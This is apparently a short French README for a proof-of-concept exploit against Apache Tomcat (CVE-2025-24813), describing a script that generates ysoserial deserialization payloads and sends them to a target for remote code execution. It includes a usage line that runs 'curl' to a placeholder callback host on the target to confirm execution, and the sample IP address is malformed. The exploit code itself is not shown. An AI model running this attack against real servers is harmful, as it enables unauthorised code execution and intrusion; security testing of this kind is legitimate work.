
Un PoC pour CVE-2025-24813
CVE-2025-24813 affecte Apache Tomcat - si la version est vulnérable et spectaculairement mal configurée, un attaquant peut obtenir une exécution de code à distance (RCE) avec un seul GET et un seul POST.
Plus d'infos ici
Il s'agit du script de Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang et Qi Deng tiré du récent writeup, modifié pour accepter une commande, générer toutes les charges utiles (gadgets) ysoserial et les envoyer à votre cible.
Partagé dans l'intérêt des tests de sécurité éthiques.
Exemple d'utilisation :
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
poc.mp4 montre le script en action : génération des charges utiles et envoi à la cible ; dans le volet de droite, on voit que l'écouteur interact est contacté.